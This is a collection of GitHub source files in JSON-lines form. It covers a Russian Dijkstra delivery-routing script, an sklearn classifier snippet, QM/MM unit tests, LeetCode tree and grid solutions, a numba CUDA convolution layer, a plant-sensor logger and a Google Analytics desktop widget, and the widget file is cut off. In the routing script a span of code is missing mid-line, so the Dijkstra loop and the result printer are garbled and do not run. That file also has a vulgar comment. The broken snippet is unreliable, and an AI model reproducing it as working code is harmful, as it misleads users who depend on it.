+{"seq_id":"37604073024","text":"import sys\n\nh=45\npriority={'Высокий':0.74, 'Средний':1, 'Низкий':1.25}\n\nclass Graph(object):\n def __init__(self, nodes, init_graph):\n self.nodes = nodes\n self.graph = self.construct_graph(nodes, init_graph)\n\n def construct_graph(self, nodes, init_graph):\n '''\n Этот метод обеспечивает симметричность графика. Другими словами, если существует путь от узла A к B со значением V, должен быть путь от узла B к узлу A со значением V.\n '''\n graph = {}\n for node in nodes:\n graph[node] = {}\n\n graph.update(init_graph)\n\n for node, edges in graph.items():\n for adjacent_node, value in edges.items():\n if graph[adjacent_node].get(node, False) == False:\n graph[adjacent_node][node] = value\n\n return graph\n\n def get_nodes(self):\n \"Возвращает узлы графа\"\n return self.nodes\n\n def get_outgoing_edges(self, node):\n \"Возвращает соседей узла\"\n connections = []\n for out_node in self.nodes:\n if self.graph[node].get(out_node, False) != False:\n connections.append(out_node)\n return connections\n\n def value(self, node1, node2):\n \"Возвращает значение ребра между двумя узлами\"\n return self.graph[node1][node2]\n\n\ndef dijkstra_algorithm(graph, start_node):\n unvisited_nodes = list(graph.get_nodes())\n\n # посещении каждого узла и обновлять его по мере продвижения по графику\n shortest_path = {}\n\n # dict, чтобы сохранить кратчайший известный путь к найденному узлу\n previous_nodes = {}\n\n # max_value для инициализации значения \"бесконечности\" непосещенных узлов\n max_value = sys.maxsize\n for node in unvisited_nodes:\n shortest_path[node] = max_value\n # инициализируем значение начального узла 0\n shortest_path[start_node] = 0\n\n # алгоритм выполняется до тех пор, пока мы не посетим все узлы\n while unvisited_nodes:\n # узел с наименьшей оценкой\n current_min_node = None\n for node in unvisited_nodes: # Iterate over the nodes\n if current_min_node == None:\n current_min_node = node\n elif shortest_path[node] < shortest_path[current_min_node]:\n current_min_node = node\n\n #соседей текущего узла и обновляет их расстояния\n neighbors = graph.get_outgoing_edges(current_min_node)\n for neighbor in neighbors:\n tentative_value = shortest_path[current_min_node] + graph.value(current_min_node, neighbor)\n if (tentative_value<(shortest_path[neighbor]))&(tentative_value \".join(reversed(path)))\n\nsort_list=[]\n\nnodes = ['ул. им. 40-летия Победы, д. 20/1', 'ул. им. Атарбекова, д. 24','ул. им. Героя Аверкиева А.А., д. 8',\n'ул. им. Героя Аверкиева А.А., д. 8/1 к. мая, кв. 268','ул. им. Тургенева, д. 106','ул. Красных Партизан, д. 117','ул. Северная, д. 389',\n'ул. Уральская, д. 166/3','��л. Северная, д. 524','ул. им. Кирилла Россинского, д. 61/1', 'ул. Коммунаров, д. 258',\n'ул. им. Дзержинского, д. 100','ул. Северная, д. 326','ул. им. 40-летия Победы, д. 34',\n'ул. Красная, д. 176','ул. Уральская, д. 79/1','ул. Северная, д. 326','ул. Красная, д. 149', 'ул. Целиноградская, д. 6/1',\n'ул. им. Дзержинского, д. 100','ул. Российская, д. 418',\"ул. им. Володи Головатого, д. 313\",'ул. Красная, д. 145']\nsort_list=nodes\n'''''''''\nstaff_point=[] #i-ого сотрудника\nsort_list=nodes#отсортированные по важности и условиям задачи\nnodes=staff_point.append(sort_list) #точки сотрудников\n\n\n\n\n'''''''''''\ninit_graph = {}#получаем хуй за щеку с апи\nfor node in nodes:\n init_graph[node] = {}\n\ninit_graph[\"ул. им. 40-летия Победы, д. 20/1\"][\"ул. им. Атарбекова, д. 24\"] = 0.5#*priority.values #путь* коэффициент важности (мб + время выполнения)\ninit_graph[\"ул. им. 40-летия Победы, д. 20/1\"][\"ул. им. Героя Аверкиева А.А., д. 8\"] = 1.5#*priority.values\ninit_graph['ул. им. Героя Аверкиева А.А., д. 8'][\"ул. им. Атарбекова, д. 24\"] = 1#*priority.values\ninit_graph['ул. им. Героя Аверкиева А.А., д. 8'][\"ул. Северная, д. 326\"] = 3#*priority.values\ninit_graph[\"ул. им. Атарбекова, д. 24\"][\"ул. Северная, д. 326\"] = 5#*priority.values\ninit_graph[\"ул. Северная, д. 326\"][\"ул. Российская, д. 418\"] = 4#*priority.values\ninit_graph[\"ул. Северная, д. 326\"][\"ул. Уральская, д. 79/1\"] = 1#*priority.values\ninit_graph[\"ул. Красная, д. 176\"][\"ул. Северная, д. 326\"] = 2#*priority.values\ninit_graph[\"ул. Красная, д. 176\"][\"ул. Красная, д. 145\"] = 2#*priority.values\n\ngraph = Graph(nodes, init_graph)\n\nprevious_nodes, shortest_path = dijkstra_algorithm(graph=graph, start_node=\"ул. им. 40-летия Победы, д. 20/1\")\n\nprint_result(previous_nodes, shortest_path, start_node=\"ул. им. 40-летия Победы, д. 20/1\", target_node=\"ул. Красная, д. 145\")\n#о мб добавить веса в путь\n","repo_name":"pickleCucumber/hakaton_sketch","sub_path":"reserve.py","file_name":"reserve.py","file_ext":"py","file_size_in_byte":7114,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4684961311","text":"from google.colab import files\nuploaded = files.upload()\nimport io\ndf2 = pd.read_csv(io.BytesIO(uploaded['NumberData.csv']))\n# Dataset is now stored in a Pandas Dataframe\nfeat = ['X1','X2', 'X3','X4', 'X5','X6','X7','X8','X9']\nX = df2[feat]\nlabel = ['Y']\ny = df2[label]\n\nX_train, X_test, y_train, y_test = X[:250], X[250:], y[:250], y[250:]\n\nfrom sklearn import linear_model\nclf = linear_model.SGDClassifier(max_iter=1000, tol=1e-3)\n\nclf.fit(X_train, y_train)\n\nclf.predict(X_test.iloc[[5]])\ny_test.iloc[[5]]\n","repo_name":"dipak140/Ordinal-Number-","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41401478936","text":"from janus import qm_wrapper, mm_wrapper, qmmm, system\nimport numpy as np\nimport pytest\nimport os\n\nwater = os.path.join(str('tests/files/test_openmm/water.pdb'))\nala = os.path.join(str('tests/files/test_openmm/ala_ala_ala.pdb'))\n\npsi4 = qm_wrapper.Psi4Wrapper()\npsi4_ala = qm_wrapper.Psi4Wrapper(charge=1)\n\nom_m = mm_wrapper.OpenMMWrapper(sys_info=water,**{'md_ensemble':'NVT', 'return_info':[]})\nom_m.initialize('Mechanical')\nmain_info_m = om_m.get_main_info()\n\nom_e = mm_wrapper.OpenMMWrapper(sys_info=water,**{'md_ensemble':'NVT', 'return_info':[]})\nom_e.initialize('Electrostatic')\nmain_info_e = om_e.get_main_info()\n\nom_ala = mm_wrapper.OpenMMWrapper(sys_info=ala, **{'md_ensemble':'NVT', 'return_info':[]})\nom_ala.initialize('Electrostatic')\nmain_info_ala = om_ala.get_main_info()\n\nmech = qmmm.QMMM(psi4, om_m,sys_info=water, qm_atoms=[0,1,2], embedding_method='Mechanical' )\nelec = qmmm.QMMM(psi4, om_m,sys_info=water, qm_atoms=[0,1,2], embedding_method='Electrostatic' )\nala_link = qmmm.QMMM(psi4_ala, om_ala,sys_info=ala, qm_atoms=[i for i in range(12)], embedding_method='Electrostatic' )\nala_RC = qmmm.QMMM(psi4_ala, om_ala,sys_info=ala, qm_atoms=[i for i in range(12)], embedding_method='Electrostatic', boundary_treatment='RC' )\nala_RCD = qmmm.QMMM(psi4_ala, om_ala,sys_info=ala, qm_atoms=[i for i in range(12)], embedding_method='Electrostatic', boundary_treatment='RCD')\n\nsys_mech = system.System([0,1,2], [0], 0)\nsys_elec = system.System([0,1,2], [0], 0)\nsys_ala_link = system.System([0,1,2,3],[0], 0)\nsys_ala_RC = system.System([0,1,2,3,4,5], [0,1], 0)\nsys_ala_RCD = system.System([0], [0], 0)\n\nsys_mech.entire_sys = main_info_m\nsys_elec.entire_sys = main_info_e\nsys_ala_link.entire_sys = main_info_ala\nsys_ala_RC.entire_sys = main_info_ala\nsys_ala_RCD.entire_sys = main_info_ala\n\ndef test_find_boundary_bonds():\n\n ala_link.find_boundary_bonds(qm_atoms=[0,1,2,3])\n ala_RC.find_boundary_bonds(qm_atoms=[0,1,2,3,4,5])\n ala_RCD.find_boundary_bonds(qm_atoms=[0])\n\n assert len(ala_link.qmmm_boundary_bonds) == 1 \n assert len(ala_RC.qmmm_boundary_bonds) == 2\n assert len(ala_RCD.qmmm_boundary_bonds) == 4\n\ndef test_prepare_link_atom():\n\n ala_link.prepare_link_atom()\n ala_RC.prepare_link_atom()\n ala_RCD.prepare_link_atom()\n\n assert len(ala_link.link_atoms['all_outer_bonds']) == 0\n assert ala_link.link_atoms[0]['link_atom'] == 'H'\n assert np.allclose(np.array(ala_RC.link_atoms['all_outer_bonds'][1]), np.array([7, 8, 9]))\n assert np.allclose(np.array(ala_RC.link_atoms['all_outer_bonds'][0]), np.array([11, 12]))\n assert np.allclose(np.array(ala_RCD.link_atoms['all_outer_bonds'][0]), np.array([10, 6, 5]))\n assert len(np.array(ala_RCD.link_atoms['all_outer_bonds'][1])) == 0\n\ndef test_get_redistributed_positions():\n\n positions = sys_ala_RC.entire_sys['positions']\n pos1 = ala_RC.get_redistributed_positions(positions, ala_RC.link_atoms['all_outer_bonds'][0], ala_RC.link_atoms['all_mm'][0])\n pos2 = ala_RC.get_redistributed_positions(positions, [], ala_RC.link_atoms['all_mm'][0])\n \n pos = np.array([[ 0.15875, 0.2052 , -0.00825],\n [ 0.26225001, 0.1605, -0.0083]])\n\n assert len(pos2) == 0\n assert np.allclose(np.array(pos1), pos)\n\ndef test_get_external_charges():\n\n charges_mech = mech.get_external_charges(sys_mech)\n charges_ala_link = ala_link.get_external_charges(sys_ala_link)\n charges_ala_RC = ala_RC.get_external_charges(sys_ala_RC)\n charges_ala_RCD = ala_RCD.get_external_charges(sys_ala_RCD)\n \n assert charges_mech is None\n assert len(charges_ala_link) == 29\n assert len(charges_ala_RC) == 30\n assert len(charges_ala_RCD) == 31\n\ndef test_make_primary_subsys_trajectory():\n\n traj_mech, link_mech = mech.make_primary_subsys_trajectory()\n traj_ala, link_ala = ala_RC.make_primary_subsys_trajectory(qm_atoms=sys_ala_RC.qm_atoms)\n\n mech.traj_ps = traj_mech\n ala_RC.traj_ps = traj_ala\n\n assert len(link_mech) == 0\n assert len(link_ala) == 2\n assert len(traj_mech.xyz[0]) == 3\n assert len(traj_ala.xyz[0]) == 8\n \ndef test_make_second_subsys_trajectory():\n\n traj_mech = mech.make_second_subsys_trajectory()\n traj_ala = ala_RC.make_second_subsys_trajectory(qm_atoms=sys_ala_RC.qm_atoms)\n \n assert len(traj_mech.xyz[0]) ==6\n assert len(traj_ala.xyz[0]) == 27\n\n\ndef test_mechanical():\n mech.mechanical(sys_mech, main_info_m)\n ala_link.mechanical(sys_ala_link, main_info_ala)\n \n assert len(sys_mech.qmmm_forces) == 3\n assert len(sys_ala_link.qmmm_forces) == 5\n\n assert np.allclose(sys_mech.entire_sys['energy'], -0.010569627400199556 )\n assert np.allclose(sys_mech.primary_subsys['ll']['energy'], 4.0884494790050603e-07)\n assert np.allclose(sys_mech.primary_subsys['hl']['energy'], -74.96297372571573)\n assert np.allclose(sys_ala_link.entire_sys['energy'], 0.01606083465900136)\n assert np.allclose(sys_ala_link.primary_subsys['ll']['energy'], 0.024946918087355077)\n assert np.allclose(sys_ala_link.primary_subsys['hl']['energy'], -55.86812550986576)\n\ndef test_electrostatic():\n #ala_link.electrostatic(sys_ala_link, main_info_ala)\n #ala_RCD.electrostatic(sys_ala_RCD, main_info_ala)\n elec.electrostatic(sys_elec, main_info_e)\n \n assert len(sys_elec.qmmm_forces) == 9\n assert np.allclose(sys_elec.entire_sys['energy'], -0.010569627400199556)\n assert np.allclose(sys_elec.primary_subsys['ll']['energy'], 4.0884494790050603e-07)\n assert np.allclose(sys_elec.second_subsys['ll']['energy'],8.553464518012368e-05 )\n assert np.allclose(sys_elec.primary_subsys['hl']['energy'], -74.97080694971332)\n\n\ndef test_update_traj():\n\n mech.traj.xyz[0] = np.zeros((9,3))\n pos1 = mech.traj.xyz[0]\n mech.update_traj(main_info_m['positions'], main_info_m['topology'], 'OpenMM')\n \n assert np.allclose(pos1, np.zeros((9,3)))\n assert np.allclose(mech.traj.xyz[0], main_info_m['positions'])\n \ndef test_run_qmmm():\n mech.qm_atoms = [0,1,2]\n ala_link.qm_atoms = [0,1,2,3]\n\n mech.run_qmmm(main_info_m, 'OpenMM')\n ala_link.run_qmmm(main_info_ala, 'OpenMM')\n\n assert 'qm' in mech.systems[0]\n assert 'qm' in ala_link.systems[0]\n assert len(mech.systems[0]['qmmm_forces']) == 3\n assert len(ala_link.systems[0]['qmmm_forces']) == 33\n assert np.allclose(mech.systems[0]['qmmm_energy'],-74.98137698595846)\n assert np.allclose(ala_link.systems[0]['qmmm_energy'],-55.809616706920814)\n assert mech.run_ID == 1\n assert ala_link.run_ID == 1\n \n\ndef test_get_forces():\n f_mech = mech.get_forces()\n f_link = ala_link.get_forces()\n\n assert len(f_mech) == 3\n assert len(f_link) == 33\n\n\n#def test_compute_gradients():\n# pass in a system with gradients \n # tested in mechanical and electrostatic, but need for RCD testing\n","repo_name":"CCQC/janus","sub_path":"tests/test_qmmm.py","file_name":"test_qmmm.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"} +{"seq_id":"25003120416","text":"from typing import List\n\n\ndef maxAreaOfIsland(grid: List[List[int]]) -> int:\n rows, columns = len(grid), len(grid[0])\n visited = set()\n maxArea = 0\n\n def dfs(r, c):\n if r < 0 or c < 0 or r >= rows or c >= columns or grid[r][c] == 0 or (r,c) in visited:\n return 0\n\n visited.add((r, c))\n \n return 1 + dfs(r+1, c) + dfs(r-1, c) + dfs(r, c+1) + dfs(r, c-1)\n\n for r in range(rows):\n for c in range(columns):\n maxArea = max(maxArea, dfs(r, c))\n\n return maxArea","repo_name":"RiadSaidur/python-practice","sub_path":"leetcode/algorithms/bfs-dfs/695. Max Area of Island.py","file_name":"695. Max Area of Island.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1878570549","text":"import numpy as np\nimport numba\nfrom numba import cuda\n\n\n@cuda.jit()\ndef cal_cov_gradient(inputs, weights, gradient_loss_to_this_outputs, g_weights, g_biases, g_inputs):\n tx = cuda.threadIdx.x\n ty = cuda.threadIdx.y\n f_num = cuda.blockIdx.x\n\n for n in range(gradient_loss_to_this_outputs.shape[0]):\n for i in range(weights.shape[1]):\n for j in range(weights.shape[2]):\n for k in range(weights.shape[3]):\n tmp1 = gradient_loss_to_this_outputs[n,\n tx, ty, f_num] * weights[f_num, i, j, k]\n tmp2 = gradient_loss_to_this_outputs[n,\n tx, ty, f_num] * inputs[n, tx+i, ty+j, k]\n g_inputs[n, tx+i, ty+j, k] += tmp1\n g_weights[f_num, i, j, k] += tmp2\n g_biases[f_num] += gradient_loss_to_this_outputs[n, tx, ty, f_num]\n\n\n@cuda.jit()\ndef cov(inputs, weights, biases, outputs):\n tx = cuda.threadIdx.x\n ty = cuda.threadIdx.y\n f_num = cuda.blockIdx.x\n\n for n in range(inputs.shape[0]):\n for i in range(weights.shape[1]):\n for j in range(weights.shape[2]):\n for k in range(weights.shape[3]):\n outputs[n, tx, ty, f_num] += (\n inputs[n, tx + i, ty + j, k] * weights[f_num, i, j, k])\n outputs[n, tx, ty, f_num] += biases[f_num]\n\n\nclass Conv2D(object):\n def __init__(self, in_channels, kernel_size, features):\n self.features = features\n self.ksize = kernel_size\n weights_scale = np.sqrt(kernel_size * kernel_size * in_channels / 2)\n self.weights = np.random.standard_normal(\n (features, kernel_size, kernel_size, in_channels)) / weights_scale\n self.biases = np.random.standard_normal(features) / weights_scale\n\n self.g_weights = None\n self.g_biases = None\n self.g_inputs = None\n self.inputs = None\n self.outputs = None\n\n def forward(self, inputs):\n self.inputs = np.zeros(shape=(inputs.shape[0], inputs.shape[1]+(self.ksize // 2)*2,\n inputs.shape[2] + (self.ksize // 2)*2, inputs.shape[3]), dtype=np.float32)\n self.inputs[:, self.ksize // 2: inputs.shape[1] + self.ksize // 2,\n self.ksize // 2: inputs.shape[2] + self.ksize // 2, :] = inputs.copy()\n self.outputs = np.zeros(shape=(\n inputs.shape[0], inputs.shape[1], inputs.shape[2], self.features), dtype=np.float32)\n grid = (self.features)\n block = (inputs.shape[1], inputs.shape[2])\n cov[grid, block](self.inputs, self.weights, self.biases, self.outputs)\n return self.outputs\n\n def backward(self, gradient_loss_to_this_outputs):\n self.g_inputs = np.zeros(shape=self.inputs.shape, dtype=np.float32)\n self.g_weights = np.zeros(self.weights.shape, dtype=np.float32)\n self.g_biases = np.zeros(self.biases.shape, dtype=np.float32)\n grid = (self.features)\n block = (self.inputs.shape[1], self.inputs.shape[2])\n cal_cov_gradient[grid, block](self.inputs, self.weights, gradient_loss_to_this_outputs,\n self.g_weights, self.g_biases, self.g_inputs)\n\n self.g_inputs = self.g_inputs[:, self.ksize//2: self.g_inputs.shape[1] - self.ksize//2,\n self.ksize//2: self.g_inputs.shape[2] - self.ksize//2, :]\n return self.g_inputs\n\n def update_parameters(self, lr):\n self.weights -= self.g_weights * lr / self.inputs.shape[0]\n self.biases -= self.g_biases * lr / self.inputs.shape[0]\n","repo_name":"HuynhCo111999/HandwrittenRecognitionParallel","sub_path":"Parallel/conv2d.py","file_name":"conv2d.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37736916055","text":"import digitalio, analogio\nimport board\nimport busio\nimport time\nimport adafruit_sdcard\nimport adafruit_dht\nimport storage\nimport adafruit_pcf8523\nimport gc\nimport sys\nfrom adafruit_seesaw.seesaw import Seesaw\nfrom clock import rtc,i2c\n\ngc.enable()\n\n# initialize and mount the SD card\ndef mount_SD():\n spi= busio .SPI ( board .SCK , board .MOSI , board . MISO )\n cs= digitalio . DigitalInOut ( board . D10)\n sdcard = adafruit_sdcard . SDCard (spi , cs)\n vfs= storage . VfsFat ( sdcard )\n storage . mount (vfs , \"/sd\")\n\n#initialize humidity & temperature sensor\ndef get_DHT(dht_pin):\n return adafruit_dht.DHT22(dht_pin)\n\ndef get_soil_sensor(i2c):\n return Seesaw(i2c, addr = 0x36)\n\n#get photocell\ndef get_photocell(photocell_pin):\n return analogio.AnalogIn(photocell_pin)\n\ndef init_leds():\n\n yellow = digitalio.DigitalInOut(board.D6)\n blue = digitalio.DigitalInOut(board.D9)\n green = digitalio.DigitalInOut(board.D11)\n red = digitalio.DigitalInOut(board.D12)\n yellow.direction = digitalio.Direction.OUTPUT\n blue.direction = digitalio.Direction.OUTPUT\n green.direction = digitalio.Direction.OUTPUT\n red.direction = digitalio.Direction.OUTPUT\n\n return yellow, blue, green, red\n\n#get analogue voltage\ndef analog_voltage (adc):\n return (adc.value / 65535 * adc.reference_voltage)\n\n#calibrates all sensors\ndef calibrate_sensors():\n print('\\n\\nsensors calibrated\\n\\n')\n\ndef correct_humidity():\n print('\\nmisting air with water to correct humidity\\n')\n for blink in range(2):\n yellow.value = True\n time.sleep(.05)\n yellow.value = False\n time.sleep(.05)\ndef correct_moisture():\n print('\\nwatering plants to increase soil moisture\\n')\n for blink in range(2):\n blue.value = True\n time.sleep(.05)\n blue.value = False\n time.sleep(.05)\ndef correct_temperature():\n print('\\nTemperature is off; adjust climate control\\n')\n for blink in range(2):\n green.value = True\n time.sleep(.05)\n green.value = False\n time.sleep(.05)\n\n#returns list of current values\ndef log_values(t,dht,photocell,soil):\n t_abs = rtc.datetime\n date = str (t_abs.tm_mday) + '/' + str(t_abs.tm_mon) + '/' + str(t_abs.tm_year)\n times = str(t_abs.tm_hour) + ':' + str(t_abs.tm_min) + ':' + str(t)\n\n air_temp = dht.temperature\n humidity = dht.humidity\n photo_val = photocell.value\n volts = analog_voltage(photocell)\n moisture = moisture_to_percent(soil.moisture_read())\n soil_temp = 1 # soil.get_temp()\n\n return (date,times,humidity,moisture,air_temp,soil_temp,photo_val,volts)\n\n# checks latest reading for values out of tolerance regions\ndef check_log(log,POS,flowering):\n bounds = [(65,85),(.2,.3),(21.1,26.8)] # tolerance region for humidity, moisture, and air temp\n if flowering:\n bounds[0] = (50,65)\n flags = [False for _ in range(3)]\n for pos in range(len(flags)):\n if pos == 1:\n if log[pos+2]bounds[pos][1]:\n flags[pos] = True\n return tuple(flags)\n\ndef print_log(log, POS):\n print_str = ''\n for data,label in zip(log,POS):\n if label is 'humidity':\n print_str += label + ': ' + str(data) + '% ; '\n elif label is 'moisture':\n print_str += label + ': {:.1f}% ; '.format(data*100)\n else:\n print_str += label + ': ' + str(data) + ' ; '\n return print_str\n\n\ndef cross_check(flags_log):\n try:\n match = [(c and l) for c,l in zip(flags_log[-1],flags_log[-2])]\n except Exception as e:\n print('could not get two previous flag logs')\n\n if match[0] and not match[1]:\n correct_humidity()\n if match[1]:\n correct_moisture()\n if match[2]:\n correct_temperature()\n\n#returns the past moisture reading where r is how many readings back is returned\ndef get_past_moisture(logs,POS, r = 1):\n try:\n return logs[-1*(1+r)][POS['moisture']]\n except Exception as e:\n print('error in get_past_moisture():\\n' + str(e))\n#returns the percent moisture\ndef moisture_to_percent(moisture):\n percent = ((moisture - 200)/1800)\n print('{:.1f}% moisture'.format(percent*100))\n return percent\n\nmount_SD()\ndht = get_DHT(board.D5)\nsoil = get_soil_sensor(i2c)\nphotocell = get_photocell(board.A1)\nPOS = ('date', 'time', 'humidity', 'moisture', 'air temp',\n 'soil temp', 'photo val', 'volts') #position of various data in logs\nlogs = []\nflags_log = [] #record of past flag logs\nmax_len = 50 #maximum length for logs until older entries are overwritten\nyellow,blue,green,red = init_leds()\npopped = False\ntime_not_up = True\nflowering = False\nrun_time = 30 #runtime in seconds\nti = rtc.datetime[5]\n\nwith open(\"/sd/results.txt\", \"w\") as f:\n while time_not_up:\n t = rtc.datetime[5]-ti\n if t % 5 == 0: #setting the interval for sensor calibration\n calibrate_sensors()\n\n if t % 2 == 0: #setting the interval for logging data\n current_log = log_values(t,dht,photocell,soil)\n if len(logs) < max_len:\n logs.append(current_log)\n else:\n logs.pop(0)\n logs.append(current_log)\n\n current_flags = check_log(current_log, POS, flowering)\n\n if len(flags_log) >= max_len:\n if not popped:\n f.write('\\n\\npopping oldest reading\\n\\n')\n flags_log.pop(0)\n popped = True\n\n flags_log.append(current_flags)\n if len(flags_log)>1:\n cross_check(flags_log)\n\n print_log(current_log,POS)\n f.write('run time is ' + str(t) + ' seconds:\\n ' + print_log(current_log,POS) + '\\n')\n\n if t >= run_time:\n time_not_up = False\n print('\\n\\nruntime is complete\\n\\n')\n else:\n time.sleep(1)","repo_name":"ENGR-133-Group-7/algorithms","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33759535858","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020/8/13 9:06\n @Author : QDY\n @FileName: 129. 求根到叶子节点数字之和.py\n @Software: PyCharm\n\"\"\"\n\"\"\"\n 给定一个二叉树,它的每个结点都存放一个0-9的数字,每条从根到叶子节点的路径都代表一个数字。\n 例如,从根到叶子节点路径 1->2->3 代表数字 123。\n 计算从根到叶子节点生成的所有数字之和。\n 说明:叶子节点是指没有子节点的节点。\n \n 示例 1:\n 输入: [1,2,3]\n 1\n / \\\n 2 3\n 输出: 25\n 解释:\n 从根到叶子节点路径 1->2 代表数字 12.\n 从根到叶子节点路径 1->3 代表数字 13.\n 因此,数字总和 = 12 + 13 = 25.\n \n 示例 2:\n 输入: [4,9,0,5,1]\n 4\n / \\\n 9 0\n / \\\n 5 1\n 输出: 1026\n 解释:\n 从根到叶子节点路径 4->9->5 代表数字 495.\n 从根到叶子节点路径 4->9->1 代表数字 491.\n 从根到叶子节点路径 4->0 代表数字 40.\n 因此,数字总和 = 495 + 491 + 40 = 1026.\n\n\"\"\"\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def sumNumbers(self, root) -> int:\n if not root: return 0\n self.res = 0\n\n def dfs(cur, node):\n cur = cur * 10 + node.val\n if not node.left and not node.right:\n self.res += cur\n return\n if node.left:\n dfs(cur, node.left)\n if node.right:\n dfs(cur, node.right)\n\n dfs(0, root)\n return self.res\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/129. 求根到叶子节点数字之和.py","file_name":"129. 求根到叶子节点数字之和.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24226686889","text":"#!/usr/bin/env python3\n\"\"\"Transparent \"dashlet\" rendering Google Analytics data.\"\"\"\n\nimport httplib2\nimport argparse\nimport cairo\nimport gi\n\ngi.require_version('Gtk', '3.0')\n\nfrom gi.repository import GLib, Gtk, Gdk\nfrom apiclient.discovery import build\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom oauth2client import client, file, tools\n\ndef get_service(api_name, api_version, scope, key_file_location):\n \"\"\"Get a service that communicates to a Google API.\n\n Args:\n api_name: The name of the api to connect to.\n api_version: The api version to connect to.\n scope: A list auth scopes to authorize for the application.\n key_file_location: The path to a valid service account JSON key file.\n\n Returns:\n A service that is connected to the specified API.\n \"\"\"\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n key_file_location, scopes=scope)\n\n # Build the service object.\n service = build(api_name, api_version, credentials=credentials)\n\n return service\n\n\ndef get_first_profile_id(service):\n # Use the Analytics service object to get the first profile id.\n\n # Get a list of all Google Analytics accounts for this user\n accounts = service.management().accounts().list().execute()\n\n if accounts.get('items'):\n # Get the first Google Analytics account.\n account = accounts.get('items')[0].get('id')\n\n # Get a list of all the properties for the first account.\n properties = service.management().webproperties().list(\n accountId=account).execute()\n\n if properties.get('items'):\n # Get the first property id.\n property = properties.get('items')[0].get('id')\n\n # Get a list of all views (profiles) for the first property.\n profiles = service.management().profiles().list(\n accountId=account,\n webPropertyId=property).execute()\n\n if profiles.get('items'):\n # return the first view (profile) id.\n return profiles.get('items')[0].get('id')\n\n return None\n\n\ndef get_results(service, profile_id):\n results = {}\n results['week'] = service.data().ga().get(\n ids='ga:' + profile_id,\n start_date='7daysAgo',\n end_date='today',\n metrics='ga:pageviews,ga:adsenseRevenue').execute()\n results['yesterday'] = service.data().ga().get(\n ids='ga:' + profile_id,\n start_date='yesterday',\n end_date='yesterday',\n metrics='ga:pageviews,ga:adsenseRevenue').execute()\n results['today'] = service.data().ga().get(\n ids='ga:' + profile_id,\n start_date='today',\n end_date='today',\n metrics='ga:pageviews,ga:adsenseRevenue').execute()\n return results\n\ndef ga_auth():\n key_file_location = 'client_secrets.json'\n service = get_service('analytics', 'v3', ['https://www.googleapis.com/auth/analytics.readonly'], key_file_location)\n profile = get_first_profile_id(service)\n return (service, profile)\n\ndef ga_fetch(service, profile):\n return get_results(service, profile)\n\nclass MyWin (Gtk.Window):\n def __init__(self):\n super(MyWin, self).__init__()\n self.set_position(Gtk.WindowPosition.CENTER)\n\n self.set_size_request(300, 70)\n self.set_border_width(10)\n self.restore_position()\n\n self.screen = self.get_screen()\n self.visual = self.screen.get_rgba_visual()\n if self.visual != None and self.screen.is_composited():\n self.set_visual(self.visual)\n else:\n print(\"Sorry, your screen is not composite! Transparency won't work.\")\n\n self.set_app_paintable(True)\n self.connect(\"draw\", self.area_draw)\n self.connect(\"window-state-event\", self.window_state_event_cb)\n\n self.show_all()\n self.set_decorated(False)\n self.get_window().set_decorations(Gdk.WMDecoration.BORDER)\n self.get_window().set_type_hint(Gdk.WindowTypeHint.UTILITY)\n self.set_skip_taskbar_hint(True)\n self.set_skip_pager_hint(True)\n\n (self.service, self.profile) = ga_auth()\n self.update(None)\n GLib.timeout_add_seconds(30, self.update, None)\n\n def get_config_file(self):\n path = GLib.build_pathv('/', (GLib.get_user_config_dir(), 'ga-dashlet', None))\n GLib.mkdir_with_parents(path, 0o700)\n return GLib.build_filenamev((path, 'settings.ini'))\n\n def restore_position(self):\n try:\n k = GLib.KeyFile.new()\n k.load_from_file(self.get_config_file(), GLib.KeyFileFlags.NONE)\n self.x = k.get_integer('window', 'x')\n self.y = k.get_integer('window', 'y')\n self.move(self.x, self.y)\n except:\n print(\"Cannot restore position\")\n\n def save_position(self, x, y):\n k = GLib.KeyFile.new()\n k.set_integer('window', 'x', x)\n k.set_integer('window', 'y', y)\n k.save_to_file(self.get_config_file())\n\n def window_state_event_cb(self, widget, event):\n (x, y) = self.get_window().get_position()\n if self.x != x or self.y != y:\n self.x = x\n self.y = y\n self.save_position(x, y)\n\n def update(self, user_data):\n self.data = ga_fetch(self.service, self.profile)\n Gtk.Widget.queue_draw_area(self, 0, 0, 300, 70)\n return True\n\n def area_draw(self, widget, cr):\n cr.set_source_rgba(.2, .2, .2, 0.5)\n cr.set_operator(cairo.OPERATOR_SOURCE)\n cr.paint()\n cr.set_operator(cairo.OPERATOR_OVER)\n\n # Draw text + numbers\n cr.select_font_face(\"Monospace\",\n cairo.FONT_SLANT_NORMAL,\n cairo.FONT_WEIGHT_NORMAL);\n cr.set_source_rgba(1, 1, 1, 1)\n cr.set_font_size(11);\n cr.move_to(12, 20);\n cr.show_text(self.data['today'].get('profileInfo').get('profileName'))\n\n cr.set_source_rgba(0.9, 0.9, 0.9, 1)\n cr.move_to(18, 38);\n cr.show_text(\"Today %6s Views %03.2f EUR\" % (\n self.data['today'].get('rows')[0][0],\n float(self.data['today'].get('rows')[0][1])))\n cr.move_to(18, 52);\n cr.show_text(\"Yesterday %6s Views %03.2f EUR\" % (\n self.data['yesterday'].get('rows')[0][0],\n float(self.data['yesterday'].get('rows')[0][1])))\n cr.move_to(18, 66);\n 